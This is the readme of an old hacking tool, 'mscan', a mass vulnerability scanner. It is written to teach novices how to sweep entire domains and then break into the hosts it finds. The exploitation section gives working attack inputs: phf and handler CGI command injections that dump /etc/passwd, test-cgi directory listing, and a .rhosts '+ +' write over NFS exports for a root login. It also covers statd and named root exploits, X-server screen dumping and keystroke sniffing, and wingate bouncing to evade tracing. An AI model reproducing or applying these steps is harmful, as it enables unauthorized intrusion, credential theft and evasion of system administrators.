readme-now

非常高效的扫描器

    _______________________________________________________
 /()*/////////////////////////////////////////////////////*()/
 /()*//// *** mscan, 1.0 public release, by jsbach ***////*()/
 /()*/////////////////////////////////////////////////////*()/
   --------------------------------------------------------

<chron1c> nothing would be owned if it wasnt for mscan :P


 // *credits* //

 *
 *
 * thanks to  :  gewf for 0wning shit with me, digital for being less 
 * depressed than me, chrak for help and being obsessed with fatima and shit, 
 * tip for being a bot, snarfblat for crashing his car and giving 
 * me moral support and shit, seeweed for scanning mil from his home box,
 * d_silver for being better than me, blackIC for leaving me nobody to talk
 * to at 3 AM, chron1c for uh EVERYTHING and #kode for replacing
 * my social life and keeping me sane.
 *
 * no thanks to : so1o, prym, EMF, overdose ('cool white boy shawn'),
 * #phrack, most of #2600, and every other superior arrogant 3l1t3 n4s4
 * h4ck1ng fuck on irc.
 *
 * shit i don't deserve credit for:
 *    I modified a function in BiT's statd scanner and turned it into 
 * int statd(char *ip) (BiT ripped much of his statd-scanner rip rpcinfo 
 * btw.)
 * I modified ADMtelnet from the ADM inet w0rm to retrieve the telnet banner.
 * And I modified Joshua Drake's named checking src... THANK YOU to all
 * these ppl I ripped from ! I AM YOUR SLAVE @$!@@@*$!(!
 *
 *


//* CONTENTS: *//

1.   Description of command line options.
2.   Exploiting the remote vulnerabilities mscan looks for.
3.   Speeding up mscan, slowing it down, hiding it, etc.



//////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////


  mscan is a tool I created for script kiddies like so1o (the absolute
king of script kiddies), analyzer, etc. If you don't feel like
learning how to use it to its maximum potential, here is the general
idea:

% ./scan -z org.au -taE -c 80 > org.au.log &.

Come back in a few hours and open the file org.au.log.  You will most
likely see an abundance of boxes exporting / to everyone, boxes running
phf, handler, statd, imap, and named, among other things.  See below for
information on hacking these boxes.

///////////////////////////////////////////////
1. Verbose description of command line opts : :
///////////////////////////////////////////////

-h [name of network]:  this uses host -l [name of network] | grep "has
address" | awk '{print $4}' to gather IP's.  What host -l does is ask a
nameserver to dump every host/subdomain it has authority over, so if you
did ./mscan -h harvard.edu -at > log & you'd scan every *.harvard.edu box,
but not the *.*.harvard.edu boxes. (This is a tough concept for some
kiddies.)  Some nets don't allow people to do host -l queries because 
it puts excessive load on the nameservers and creates a security
problem, but most nets still do.

-z [name of network]:  z0ne is a tool written by crazy-b of ADM.  Unlike
host -l, it gets IP's from every level of a domain (i.e. ALL OF THEM.).
If you did something like ./mscan -z harvard.edu -ant (or whatever) you'd
scan ALL of harvard.  z0ne is quirky, sometimes it times out when NS's are
queryable and shit.. when in doubt use -h.


-r [ip of net] :  -r is for nets that don't allow host -l type queries.
It brute force reverse DNS lookup the network to see what hosts exist,
and then resolves them into IP addresses.  If you provide only one field
of the IP address rdns defaults to class A, 2 fields class B, 3 fields
class C.  (i.e. ./mscan -r 206 -at would scan the class A 206.x.x.x;
./mscan -r 206.152 -at would class the class B 206.152.x.x, etc etc).
This is a slow way to gather IP's, but it gets around ICMP packet filters
and nameservers that block AXFR queries.

-n : don't gather IP's, read from the file specified with -f (or the
default, which is .ipdb.)  This is useful for resuming scans, etc, etc.

-f : use specified file as IP database.  If you wanna use your own IP
database do something like ./mscan -n -f myipfile [scan options].

-S : check for boxes running statd.  When combined with the -t option, it
only reports solaris boxes running statd (maybe 1 in 5-10 of these are
vulnerable depending on where you are scanning).  Otherwise, every statd
box is printed (most boxes running statd are slowaris anyways, kiddies.)

-E : check NFS exports... need I say more.  If yer on a box with a
showmount path different than /usr/sbin/showmount, change the execl in
showmount.c and recompile.

-C : check for boxes running vulnerable cgi programs.  I find that the
only real useful ones are handler, phf, and test-cgi so for the sake of
speed I took all the other ones out (previously i was checking for
webdist, queryhit, and some other shit.)  It would be easy to add more cgi
checks if yer not a kiddie (which yew probably are, so don't bother).

-X : check for open X servers.  If you don't know what this means, go read
the X security paper on http://www.rootshell.com (thats where I got the
idea for this check btw.)
 
-N : report linux and freebsd running vulnerable versions of named.  This
bug is COMMON !@&*!@&( Kiddies, you can root high class shit with this
bug.  Have fun.

-P : check for POP3d when another vulnerability which allows account
names to be compromised is present.  Many versions of POP3d don't log
invalid login attempts, making it a perfect target for brute forcing.

-V : Print all the excess shit (OS type, telnet banner, pop banner,
portscan infos, old vulnerabilities, etc).  If yer interested in 0wning a
secure net you should use this so that you can scrutinize all of it....

-F : Check if IRIX default account exists, and finger all users.
-N : Check for linux running *vulnerable* versions of named.

-t : truncate output, only report boxes yew can own immediately.  I always
use this option, it makes the output much cleaner and cuts out all the BS.

-f : use optarg as the IP database.  This is useful for when you want to
run multiple scans in the same working directory (if you used .ipdb for
both they'd step on each other.)

-a : scan for all vulnerabilities except open X servers, pop
servers, @ fingers, and exports.

-b : scan for EVERYTHING.  Slows it down a bit.




Some common usage:

To do a FAST scan for wingates in or.jp:
./mscan -c 150 -h or.jp -w > wingate.or.jp & 

To scan for boxes you can hack without much work in or.jp:
./mscan -c 90 -h or.jp -at > log.or.jp &

Scanning a non-queryable domain:
% nslookup aol.com
aol.com ADDR 203.66.66.66

/* hmmmm aol must own the class B 203.66, soooo */
% ./mscan -c 90 -r 203.32 -av > A0L.L0gZ


/////////////////////////////////////////////////////////////////////////


//////////////////////////////////////////////////
////* 2. exploiting vulnerabilities you find *////
//////////////////////////////////////////////////


places to get exploits :

ftp://ftp.technotronic.com
http://www.rootshell.com
http://www.dhp.com/~fyodor/


 ----------------
// * WINGATE * //
----------------

 Your first step in becoming a hacker is finding massive amounts of
wingates.  Wingates allow you to bounce your connection so that system
administrators will have great difficulty tracing you back to your ISP
after you 0wn them. 
   Before you scan anything with mscan -a, make sure you
gather some wingates so that when the time of h4x0r1ng c0mes, you can
b0unc3 y0ur c0nnecshun$!@$#%!  If you don't do this you m1ght g1t BuSteD
@$&*!@$()

 Log into a wingate like this:

Trying 69.69.69.69...
Connected to wingate.microsoft.com.
Escape character is '^]'.           
WinGate>

At the wingate prompt, enter the hostname and port to connect to.
To find wingates do something like this:

% ./mscan -z org.au -w > wingate.log &

Come back in a few hours and search the log for "wingate".
mscan averages 3 seconds per host per process when scanning
only for wingate, so for the default 75 processes that mscan
uses, about 25 hosts are scanned per second, and I find that
a wingate is usually detected every 5 - 10 minutes.

 ------------
// * PHF * //
------------

 - (some script kiddies might know this already, in which case they
         should skip this section.)

  phf is one of the elitest holes on the internet.  Lots of boxes run phf,
  especially boxes in 3rd world countries where money is scarce and system
  administrators haven't much time to worry about petty things like
  phf.  Kiddies, its your job to hack these boxes and install
  eggdrops and DoS exploits on them, and just generally fuck them up.

  to exploit a box running phf, do something like this:
  lynx http://vulnerablebox.ac.jp/cgi-bin/phf?Qalias=x%0acat%20/etc/passwd
  to grab /etc/passwd.

  lynx http://vulnerablebox.ac.jp/cgi-bin/phf?Qalias=x%0aid
  To see what id httpd is running under.

  etc.

 ----------------
// * HANDLER * //
----------------

   this bug works on SGI's, but who cares how it works, the whole point is
   to h4x0r!@^$*&!@$
   Anyways, exploit handler like this:
   %  telnet owned.org 80
   Trying 69.69.69.69...
   Connected to bear.cs.zorg.edu.
   Escape character is '^]'.            
   GET /cgi-bin/handler/useless_shit;cat	/etc/passwd|?data=Download

   NOTE: remember the tab between cat and /etc/passwd !@&^*&^$

 -----------------
// * TEST-CGI * //
-----------------

   /cgi-bin/test-cgi will allow you to view a boxes directory structure.
   To exploit, kiddies, do this:
   lynx http://www.hacked.com/cgi-bin/test-cgi?/usr/*
   to see what's in /usr,

   or

   lynx http://www.hacked.com/cgi-bin/test-cgi?/*
   To see whats in /.
   This is useful for obtaining the usernames of individuals on the system
   so that you can brute force POP3 hack the box.

 ----------------------
// *  NFS EXPORTS  * //
----------------------
  Suppose you see something like: 
	Export list on 69.69.69.69:
	/ (everyone)
  This is good, script kiddies.  On your home box ( unless this is a .gov
  site, which stands for government ) type this:
	% mount 69.69.69.69:/ /mnt
        % cd /mnt;
        % echo "+ +" > .rhosts
        % rlogin 69.69.69.69 -l root

 -----------------
// *  STATD   * //
-----------------

  The boxes that say "NOTE: solaris box running statd^@!&^!@&*" may be
  vulnerable to the statd exploit.  The statd exploit is a great thing;
  in fact, it's what some of the most prominent script kiddies (milw0rm,
  c0d3z3r0, etc) use to h4x0r.  I find that 1 in 5 statd boxes
  will allow you remote root access by doing this with the statd exploit
  you can get at ftp.technotronic.com:

  % ./statd 69.69.69.69
  Exploit code sent,
  waiting for shell...
  #

 ---------------
// *  NAMED * //
---------------

   About 30% of redhat linux nameservers are vulnerable to the named
   buffer overflow, and will yield a remote rootshell.  

   Almost all Redhat boxes prior to 5.1 are vulnerable (assuming they
   run named). Exploit like this: (hint: you must add a s3kret line to
   rotshb's named sploit to get it to werk !@&!@$)

   % ./rotshbnamed <host> <attack type>
   
   To determine the attack type, kiddies, type this:
   % dig ip.to.check version.bind chaos txt

   And then choose the apropriate attack number.
   BE CAREFUL KIDDIES - named crashes when you do this exploit, so
   you only have one chance to h4x0r th3s3 b0x3s @$!@!@#@#$

 -----------------------
// * OPEN X SERVERS * //
-----------------------

  Well kiddies, open X servers are fun, but they take a bit of thought to get
  you root.  If you just want to h4x0r then go to the next section.
  If you find an open X server, try dumping the screen like this:

  % xwd -display host.with.open.server:0 -root > distance.xwd &
  
  Then, after that, type xv distance.xwd and you should see a picture of the
  remote boxes display come up on your screen (assuming you're in X).

  You can also use an x keyboard sniffer (which you can obtain on
  www.rootshell.com) to sniff all the keystrokes being typed on the
  remote machine.



///////////////////////////////////////////////
////3. LAME TECHNICAL DETAILS (who cares?) ////
///////////////////////////////////////////////

  mscan can be as fast as you want it to be, assuming you have the RAM,
CPU, and bandwidth to support it.  Making it faster is as simple as
using the -C <number of processes> option.

here is a rough chart of mscan speeds/processes when you scan for all
vulnerabilities.
-----------------------------------------
PROCESSES		HOSTS PER MINUTE
-c 1			6
-c 12			72
-c 24			144
-c 100			600
-c 1000			6000
-----------------------------------------
hmmmmmm... looks like a pattern is emerging here, eh kiddies?
The point is, if you h4x0r a T3 s0l4r1s box with a g1g of r4m you can set
numchildren to 1000 and scan entire countries in a matter of minutes
@$*!@^$*  If you need more help, look at this example:

% ./mscan -h or.jp -c 125 -at > or.jp.log &

This command tells mscan that at any given time, it should be checking for
vulnerabilities on 125 hosts.  A pentium with 32 megs of ram should
support this just fine (but if an admin is at the console, you can bet
he'll notice you RIGHT AWAY !&!@*).  If you want to stay discreet, do
something like -C 10.

H4v3 fun k1dd13z *)&!*@*)%&!@%&&@^&(!@4


- jsbach